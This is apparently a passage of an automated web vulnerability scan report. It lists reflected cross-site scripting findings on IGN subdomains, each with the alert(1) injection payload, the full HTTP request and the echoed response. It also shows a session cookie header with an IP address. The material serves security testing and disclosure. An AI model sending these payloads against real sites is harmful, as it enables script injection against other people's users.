Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:59 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2993-562982197-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:59 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043459152v-1n-12mc+1297043459152mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 79055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/ftp.html?ce97b"-alert(1)-"e2eae7445aa=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.185. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/000/000437.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d709"-alert(1)-"d433f769511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/000/000437.html?3d709"-alert(1)-"d433f769511=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:46 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31833-129084908-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:46 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043446781v-1n-12mc+1297043446781mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 122091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/000/000437.html?3d709"-alert(1)-"d433f769511=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.186. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/000/000437.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe0e"><script>alert(1)</script>7df89b8b82a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/000/000437.html?1fe0e"><script>alert(1)</script>7df89b8b82a=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18740-1524669549-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043440967v-1n-12mc+1297043440967mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/000/000437.html?1fe0e"><script>alert(1)</script>7df89b8b82a=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.187. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/143/14349501.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a659"-alert(1)-"5be776a8e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/143/14349501.html?5a659"-alert(1)-"5be776a8e5b=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:38 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-27912-1385020287-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043438139v-1n-12mc+1297043438139mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/143/14349501.html?5a659"-alert(1)-"5be776a8e5b=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.188. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/143/14349501.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb74b"><script>alert(1)</script>de5f96bc04e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/143/14349501.html?fb74b"><script>alert(1)</script>de5f96bc04e=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:33 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-1247651907-11;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:33 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043433922v-1n-12mc+1297043433922mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/143/14349501.html?fb74b"><script>alert(1)</script>de5f96bc04e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.189. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/143/14354229.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f038c"><script>alert(1)</script>47bca99c6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/143/14354229.html?f038c"><script>alert(1)</script>47bca99c6d1=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:32 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-315926001-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043432506v-1n-12mc+1297043432506mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 108000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/143/14354229.html?f038c"><script>alert(1)</script>47bca99c6d1=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.190. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/143/14354229.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9595"-alert(1)-"45b43c2733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/143/14354229.html?a9595"-alert(1)-"45b43c2733=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:35 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-73863227-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:35 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043435559v-1n-12mc+1297043435559mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 107913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/143/14354229.html?a9595"-alert(1)-"45b43c2733=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.191. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/748/748589.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd185"-alert(1)-"4d7636543fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/748/748589.html?fd185"-alert(1)-"4d7636543fe=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:35 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-1245665397-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:35 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043435203v-1n-12mc+1297043435203mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/748/748589.html?fd185"-alert(1)-"4d7636543fe=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.192. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/748/748589.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c75"><script>alert(1)</script>de8ae575179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/748/748589.html?23c75"><script>alert(1)</script>de8ae575179=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:31 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15005-1472647881-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043431307v-1n-12mc+1297043431307mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/748/748589.html?23c75"><script>alert(1)</script>de8ae575179=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.193. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/857/857126.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55411"><script>alert(1)</script>dc9dc68c55c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/857/857126.html?55411"><script>alert(1)</script>dc9dc68c55c=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:36 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15002-1739638031-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:36 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043436596v-1n-12mc+1297043436596mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/857/857126.html?55411"><script>alert(1)</script>dc9dc68c55c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.194. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/857/857126.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 156cf"-alert(1)-"7126e096cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/857/857126.html?156cf"-alert(1)-"7126e096cae=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15002-617907217-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043440094v-1n-12mc+1297043440094mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 115897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/857/857126.html?156cf"-alert(1)-"7126e096cae=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.195. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /submit_faq.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda0d"><script>alert(1)</script>6f395dd9df7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit_faq.html?bda0d"><script>alert(1)</script>6f395dd9df7=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:53 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32462-1058587263-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043453114v-1n-12mc+1297043453114mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 79805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/submit_faq.html?bda0d"><script>alert(1)</script>6f395dd9df7=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.196. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /submit_faq.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a3c"-alert(1)-"f5088556e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /submit_faq.html?67a3c"-alert(1)-"f5088556e3f=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:55 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2993-337717668-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:55 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043455419v-1n-12mc+1297043455419mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 79674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/submit_faq.html?67a3c"-alert(1)-"f5088556e3f=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.197. http://fimserve.ign.com/ [__ipculture parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fimserve.ign.com
Path:   /

Issue detail

The value of the __ipculture request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16299"%3balert(1)//5f9781b593c was submitted in the __ipculture parameter. This input was echoed as 16299";alert(1)//5f9781b593c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?placement=fim_ign_hub2&__preferredculture=nl-NL&__ipculture=nl-NL16299"%3balert(1)//5f9781b593c HTTP/1.1
Host: fimserve.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040527191%7C1299632527191%3B%20s_lv%3D1297040527193%7C1391648527193%3B%20s_lv_s%3DFirst%2520Visit%7C1297042327193%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Server: 585087c32e9d95876419f11bda2d6d63409345d960d798fa
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3898


function google_ad_request_done(google_ads)
{
   var i = 0;
   if (google_ads == null || google_ads.length == 0) return;
   var ctl = null;
   var str = '';
           str = '';
       document.write('<STYLE> #ad-
...[SNIP]...
itionalPageBeaconKVPs && MySpace.AdditionalPageBeaconKVPs.abtest)
               adData.abtest = MySpace.AdditionalPageBeaconKVPs.abtest;
           MySpace.Beacon.Request(adData);
       }
   }
}
var __ipculture = "nl-nl16299";alert(1)//5f9781b593c";
var google_page_url = "http://fimserve.ign.com/?placement=fim_ign_hub2&__preferredculture=nl-NL&__ipculture=nl-NL16299%3balert1//5f9781b593c&__preferredculture=sv-SE&__ipculture=sv-SE";
var google_a
...[SNIP]...

1.198. http://fimserve.ign.com/ [__preferredculture parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fimserve.ign.com
Path:   /

Issue detail

The value of the __preferredculture request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d34"%3balert(1)//b1eedcf262 was submitted in the __preferredculture parameter. This input was echoed as e8d34";alert(1)//b1eedcf262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?placement=fim_ign_hub2&__preferredculture=nl-NLe8d34"%3balert(1)//b1eedcf262&__ipculture=nl-NL HTTP/1.1
Host: fimserve.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
